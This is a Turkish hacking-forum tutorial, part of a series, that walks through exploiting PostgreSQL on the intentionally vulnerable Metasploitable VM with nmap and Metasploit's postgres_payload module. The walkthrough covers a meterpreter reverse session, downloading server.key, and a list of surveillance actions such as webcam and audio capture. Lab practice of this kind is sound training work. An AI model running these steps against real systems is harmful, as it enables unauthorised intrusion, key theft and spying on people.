Merhaba değerli Türk Hack Team üyeleri, bu konum bir önceki konumun devamı olmaktadır. Bu konumdan önce bir önceki konumu baştan sonra kadar okumanızı tavsiye ederim

Başlamadan Önce Eklemek İstediklerim;


Öncelikle bu konuya gelmeden önce diğer konuyu okuyun konunun linkini bırakıyorum. Eğer ki anlamadığınız bir nokta olursa bana imzamdaki adreslerden ulaşabilirsiniz. Forumda web sızma testlerinde sizleri geliştirmek ve görevlerimi yerine getirmek için bir seri başlattım. Bu konu ise bu serinin 2. konusu olacak. Ve de şu olay çok önemli bende makinemin teması terminal vs. bunlar farklı siz bunları aldırış etmeyin sizde farklı olabilir ama kodlar aynı olacaktır.

Neler Yapacağız Bu Konuda?


Bu konuda yine Met@sploitable içindeki bir açığı hackleyeceğiz. Bu açık:

- PosterSql


Açığıdır.

Aşamalarımız şu şekilde olacak;

- Nmap ile bir versiyon taraması
- Açığı Bulalım
- Açığı nasıl hackleriz birlikte bakalım
- Açığı Hackleyelim
- Hackledikten Sonra Beraber Gezinelim


Şeklinde aşamalarımız olacak o halde dilerseniz başlayalım.

Sanal makine virtual box u açın ve met@sploitable'ı başlatın arkadaşlar. Ve kullanıcı adı ve şifre olarak giriş yapın. Daha sonrasında saldırı yapacağımız makinenin bize IP si lazım. Bu ip ye


Kod:
ifconfig


Komutu ile bakabiliyoruz arkadaşlar. Kullanıcı adı ve şifre girdikten sonra ifconfig yazarak ip yi görüntülüyoruz.





Evet görüyoruz ki ip 192.168.1.18 olmakta. Şimdi ise aşamalara geçiş yapalım

Nmap İle Bir Versiyon Taraması


Bir önceki konumda da söylediğim gibi sitelerin portlarındaki versiyonlarda açıklar olabiliyor. İşte bizde bu açıkları sömürüp sistemi hackliyoruz aslında, tabi bu işlemleri kendimiz yasal ve etik bir ortam da işliyoruz.

Bir önceki konudan hatırlarsınız



Kod:
nmap -sV hedefip
E]


KOmutumuz bize açık portlar ile versiyon bilgilerini beraberinde veren nmap aracının Quick Scan Plus seçeneğidir. O halde taratalım makinemizi


Kod:
nmap -sV 192.168.1.18






Sonuçlar bu şekilde arkadaşlar.

Açık Bulalım

Şimdi arkadaşlar zaten met@sploitable bilerek açıklı bırakılmış bir sistem olduğu için intense scan yapmamıza gerek yok. Normalde nmap den en güzel tarama intense scandır. Çünkü hem açık portları verir hemde versiyonları verir hemde versiyonlar hakkında küçük bilgiler veriyor o küçük bilgiler aslında versiyonda bir açık var mı bunu da böyle gizlice belirtebiliyor aslında. Bizim şuanlık bunu yapmamıza gerek yok çünkü zaten bellidir burda açıklar. Örneğin şimdi burda PosterSql var;




Hani bu açıklıdır mesela şimdi bu açığı nasıl hackleriz birde gelin ona bakalım

Açığı nasıl hackleriz gelin birlikte buna bakalım

Şimdi arkadaşlar bu versiyon bilgisini önce bir seçip kopyalıyoruz. Daha sonra Fire fox u açıyoruz
.

Arama olarak PostgreSQL DB 8.3.0 - 8.3.7 exploit


Şeklinde bir arama yapıyoruz.








Mesela burda güzel siteler var.
Bunlara bakabilir ve öğrenebilirsiniz ama ben size yine detaylı anlatacağım zaten.





Açığı Hackleyelim!


Şimdi geçen konudan biliyorsunuz ki met@sploit diye bir araç vardı bu araç ne yapıyordu kısaca sızma testlerinde kullanılan bir araçtı. Bu açığı da bu araç ile hackleyeceğiz beraber. Bu aracı nasıl bir komut ile başlatıyorduk?

Kod:
msfconsole


Yazdıktan sonra açılacaktır.










Gördüğünüz gibi burda met@sploit açıldı. Şimdi ise bize araştırdığımız sitelerde bir modul vermiş olması gerek bu modulu buraya yapıştırıp o module geçiş yapacağız.

[CODE]use exploit/linux/postgres/postgres_payload[/CODE]

Modulumuz bu








Gördüğünüz gibi şuanda module geçiş yaptık. Sonrasında bazı gerekli ayarları görmek ve bunları değiştirmek lazımdı. Ne yapıyorduk?

Kod:
show options


yapınca bize bir takım ayarlar verecek.









Bakın bu sefer geçen konuda olmayan bir şey var LHOST da gerekli kendi local ip miz yani. Eğer parrot u benim dediğim gibi kurdu iseniz yeni bir terminal açıp ifconfig yazdığınızda:



Burda görünecektir

NOT: Eğer bir hata alırsanız root değilsinizdir bunun için

sudo su

...........: root şifreniz olarak roota geçiş yapabilirsiniz

anlamadığınız yerler için videolu anlatım yapıcam yarın ekleyeceğim eğer orda da anlamaziseniz sorabilirsiniz.








İp mizi öğrendik. Bu terminali kapatalım ve msf in olduğu yere geçelim. Bir ayarı değişmek için şöyle bir komutumuz vardı

Kod:
set LHOST localip


şeklinde

Kod:
set LHOST 192.168.1.11





show options da yaptığımızda görüyoruz ki ayar değişti.








Gerçi bende değişmedi ama sizde değişecektir sizde LHOST kısmı boş iken girdiğiniz ip gelecektir.

Burda vermemiş ama her zaman hedef sistemin ip sine ihtiyacımız vardır arkadaşlar

Kod:
set RHOSTS hedefip
Kod:
set RHOSTS 192.168.1.18




yapıyoruz ve hedef ip de belirlendi.

Artık hackleyebiliriz.

Kod:
exploit


diyoruz.








Evet meterpreter çıktı yani artık hacklediniz. Meterpreter adlı session un olduğu açıklar her zaman daha hoş işlemleri yapabileceğimiz açıklardır örnek ne yapabiliriz.

Bi help komutu çalıştıralım















Bakın burda kısa bir şekilde ingilizce olarak neler yapabileceğimizi bize gösteriyor. Webcam bile açabiliyormuşuz tabi bunu yaparken hedef sistemde malum webcam yok :D bu yüzden çalışmaz ama örneğin;













Mesela buralarda gördüğünüz gibi önce pwd ile nerde olduğuma baktım sonra ls dedim ve içinde çeşitli dosyalar buldum bunlardan server.key önemli gibi geldi gözüme bunun için download server.key komutu ile server.key dosyasının kopyasını karşıdan kendi bilgisayarıma aldım.

Daha da;




cd .. komutları ile geri geri gidip / dizinine geldikten sonra sistemi iyice araştırabilirsiniz.
Yapabilecekleriniz;

-Webcam den bir fotoğraf alabilir
-Önemli belgeler görüntüleyebilir
-Webcam anlık takip edilebilir
-bir saniyelik ses kaydı alınabilir
-ses anlık takip edilebilir
-ekran fotoğrafı alınabilir
-bir dosya oluşturulabilir veya silinebilir
-bir şeyi açabilir


Gibi popüler şeyler var bunlara bakabilirsiniz komutları deneyin ne işe yaradıklarını görün. Hatta ingilizce yerleri çevirin zaten açıklıyor size orda :)

Bu konumda bu kadardı umarım yararlı olmuştur iyi forumlar dilerim :)